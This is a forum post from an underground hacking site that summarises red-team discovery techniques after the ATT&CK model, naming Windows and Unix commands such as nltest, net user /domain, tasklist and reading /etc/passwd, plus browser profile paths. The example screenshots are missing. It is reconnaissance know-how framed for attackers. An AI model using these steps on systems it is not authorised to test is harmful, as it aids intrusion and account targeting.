HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Pentest Red Team Techniques - Discovery

File and Directory Discovery​

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors including whether or not the adversary fully infects the target and/or attempt specific actions.

Many command shell utilities can be used to obtain this information. Examples include dir, tree, ks, find, and locate. Custom tools may also be used to gather file and directory information and interact with the Native API.

Example

Simple by using the dir command we can enumerate directories

image
 

Domain Trust Discovery​

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain. Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting. Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP. The windows utility Ntest is known to be used by adversaries to enumerate domain trusts.

Example

Using the nltest command we can search for the trusted domains

image
 

Browser Bookmark Discovery​

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Browsers bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials in Files associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.

Example

This varies in the search since Browser's have their own folders for saving files an example would be Firefox directory found here:: %APPDATA%\Mozilla\Firefox\Profiles\

image
 

Application Window Discovery​

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.

Example

With Tasklist we can view the running applications and try to get information on how the Workstation is utilized for enumeration and see if it’s a potential target for Exploitation or other techniques.

image

Key loggers can be used as well to grab information on what the user is working on and see if this info is valuable.
 

Account Discovery​

Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid follow-on behavior.
 

Domain Account​

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domains accounts exist to aid in follow-on behavior.

Commands such as net user /domain and net group /domain of the Net utility, dccacheutil -q group, on macOS, and ldapsearch on Linux can list domain users and groups.

Example

We can utilize the net user /domain command to view users on the Domain (User utilizing this command must be part of a Domain, we cannot use this if the user is Local)

image
 

Local Account​

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exists on a system to aid in follow-on behavior.

Commands such as net user and net localgroup of the Net utility and id and groups on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated using the /etc/passwd file.

Example

By utilizing the Net Users command on CMD we can view the local Accounts

image
 
You must log in or register to reply here.
Back
Top